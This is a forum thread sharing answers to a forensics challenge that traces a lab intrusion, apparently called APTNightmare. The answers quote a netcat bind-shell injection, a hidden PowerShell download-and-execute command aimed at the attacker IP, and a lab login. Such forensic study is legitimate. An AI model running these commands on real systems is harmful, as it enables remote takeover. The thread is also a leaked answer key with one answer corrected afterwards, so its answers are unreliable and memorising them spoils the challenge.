APTNightmare
by maggi - Saturday August 31, 2024 at 05:44 AM
#1
Task 1

What is the IP address of the infected web server?

192.168.1.3

Task 2

What is the IP address of the Attacker?

192.168.1.5

Task 3

How many open ports were discovered by the attacker?

14

Task 4

What are the first five ports identified by the attacker in numerical order during the enumeration phase, not considering the sequence of their discovery?

25,53,80,110,119

Task 5

The attacker exploited a misconfiguration allowing them to enumerate all subdomains. This misconfiguration is commonly referred to as (e.g., Unrestricted Access Controls)?

DNS Zone Transfer

Task 6

How many subdomains were discovered by the attacker?

9

Task 7

What is the compromised subdomain (e.g., dev.example.com)?

sysmon.cs-corp.cd

Task 8

What email address and password were used to log in (e.g., user@example.com:password123)?

admin@cs-corp.cd:Pass@000_

Task 9

What command gave the attacker their initial access?

|mkfifo /tmp/mypipe;cat /tmp/mypipe|/bin/bash|nc -l -p 5555 >/tmp/mypipe

Task 10

What is the CVE identifier for the vulnerability that the attacker exploited to achieve privilege escalation (e.g., CVE-2016-5195)?

CVE-2021-4034

Task 11

What is the MITRE ID of the technique used by the attacker to achieve persistence (e.g., T1098.001)?

T1053.003

Task 12

The attacker tampered with the software hosted on the 'download' subdomain with the intent of gaining access to end-users. What is the MITRE ATT&CK technique ID for this attack?

T1195.002

Task 13

What command provided persistence in the cs-linux.deb file?

echo cs-linux && >> ~/.bashrc

Task 14

The attacker sent emails to employees; what is the name of the running process that allowed this to occur?

citserver

Task 15

We received a phishing email; can you provide the subject of the email?

Review Revised Privacy Policy

Task 16

What is the name of the malicious attachment?

policy.docm

Task 17

Please identify the usernames of the CEOs who received the attachment.

ceo-ru, ceo-us

Task 18

What is the hostname for the compromised CEO?

DESKTOP-ELS5JAK

Task 19

What is the full path for the malicious attachment?

C:\USERS\CEO-US\DOWNLOADS\POLICY.DOCM

Task 20

Can you provide the command used to gain initial access?

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.5:806/a'))

Task 21

What is the popular threat label for the malicious executable used to gain initial access?

trojan.cobaltstrike/beacon

Task 22

What is the payload type?

windows-beacon_http-reverse_http

Task 23

What task name has been added by the attacker?

WindowsUpdateChecker
#2
(Aug 31, 2024, 05:44 AM)maggi Wrote: Task 1

What is the IP address of the infected web server?

192.168.1.3

Task 2

What is the IP address of the Attacker?

192.168.1.5

Task 3

How many open ports were discovered by the attacker?

14

Task 4

What are the first five ports identified by the attacker in numerical order during the enumeration phase, not considering the sequence of their discovery?

25,53,80,110,119

Task 5

The attacker exploited a misconfiguration allowing them to enumerate all subdomains. This misconfiguration is commonly referred to as (e.g., Unrestricted Access Controls)?

DNS Zone Transfer

Task 6

How many subdomains were discovered by the attacker?

9

Task 7

What is the compromised subdomain (e.g., dev.example.com)?

sysmon.cs-corp.cd

Task 8

What email address and password were used to log in (e.g., user@example.com:password123)?

admin@cs-corp.cd:Pass@000_

Task 9

What command gave the attacker their initial access?

|mkfifo /tmp/mypipe;cat /tmp/mypipe|/bin/bash|nc -l -p 5555 >/tmp/mypipe

Task 10

What is the CVE identifier for the vulnerability that the attacker exploited to achieve privilege escalation (e.g., CVE-2016-5195)?

CVE-2021-4034

Task 11

What is the MITRE ID of the technique used by the attacker to achieve persistence (e.g., T1098.001)?

T1053.003

Task 12

The attacker tampered with the software hosted on the 'download' subdomain with the intent of gaining access to end-users. What is the MITRE ATT&CK technique ID for this attack?

T1195.002

Task 13

What command provided persistence in the cs-linux.deb file?

echo cs-linux && >> ~/.bashrc

Task 14

The attacker sent emails to employees; what is the name of the running process that allowed this to occur?

citserver

Task 15

We received a phishing email; can you provide the subject of the email?

Review Revised Privacy Policy

Task 16

What is the name of the malicious attachment?

policy.docm

Task 17

Please identify the usernames of the CEOs who received the attachment.

ceo-ru, ceo-us

Task 18

What is the hostname for the compromised CEO?

DESKTOP-ELS5JAK

Task 19

What is the full path for the malicious attachment?

C:\USERS\CEO-US\DOWNLOADS\POLICY.DOCM

Task 20

Can you provide the command used to gain initial access?

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.5:806/a'))

Task 21

What is the popular threat label for the malicious executable used to gain initial access?

trojan.cobaltstrike/beacon

Task 22

What is the payload type?

windows-beacon_http-reverse_http

Task 23

What task name has been added by the attacker?

WindowsUpdateChecker

Task 23 is not working

#3
(Sep 21, 2024, 12:27 AM)gfttjdb Wrote:
(Aug 31, 2024, 05:44 AM)maggi Wrote: Task 1

What is the IP address of the infected web server?

192.168.1.3

Task 2

What is the IP address of the Attacker?

192.168.1.5

Task 3

How many open ports were discovered by the attacker?

14

Task 4

What are the first five ports identified by the attacker in numerical order during the enumeration phase, not considering the sequence of their discovery?

25,53,80,110,119

Task 5

The attacker exploited a misconfiguration allowing them to enumerate all subdomains. This misconfiguration is commonly referred to as (e.g., Unrestricted Access Controls)?

DNS Zone Transfer

Task 6

How many subdomains were discovered by the attacker?

9

Task 7

What is the compromised subdomain (e.g., dev.example.com)?

sysmon.cs-corp.cd

Task 8

What email address and password were used to log in (e.g., user@example.com:password123)?

admin@cs-corp.cd:Pass@000_

Task 9

What command gave the attacker their initial access?

|mkfifo /tmp/mypipe;cat /tmp/mypipe|/bin/bash|nc -l -p 5555 >/tmp/mypipe

Task 10

What is the CVE identifier for the vulnerability that the attacker exploited to achieve privilege escalation (e.g., CVE-2016-5195)?

CVE-2021-4034

Task 11

What is the MITRE ID of the technique used by the attacker to achieve persistence (e.g., T1098.001)?

T1053.003

Task 12

The attacker tampered with the software hosted on the 'download' subdomain with the intent of gaining access to end-users. What is the MITRE ATT&CK technique ID for this attack?

T1195.002

Task 13

What command provided persistence in the cs-linux.deb file?

echo cs-linux && >> ~/.bashrc

Task 14

The attacker sent emails to employees; what is the name of the running process that allowed this to occur?

citserver

Task 15

We received a phishing email; can you provide the subject of the email?

Review Revised Privacy Policy

Task 16

What is the name of the malicious attachment?

policy.docm

Task 17

Please identify the usernames of the CEOs who received the attachment.

ceo-ru, ceo-us

Task 18

What is the hostname for the compromised CEO?

DESKTOP-ELS5JAK

Task 19

What is the full path for the malicious attachment?

C:\USERS\CEO-US\DOWNLOADS\POLICY.DOCM

Task 20

Can you provide the command used to gain initial access?

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.5:806/a'))

Task 21

What is the popular threat label for the malicious executable used to gain initial access?

trojan.cobaltstrike/beacon

Task 22

What is the payload type?

windows-beacon_http-reverse_http

Task 23

What task name has been added by the attacker?

WindowsUpdateChecker

Task 23 is not working

Oh shit, good looks!

(Aug 31, 2024, 05:44 AM)maggi Wrote: Task 23

What task name has been added by the attacker?

WindowsUpdateChecker

WindowsUpdateCheck

Sorry about that one *smh*
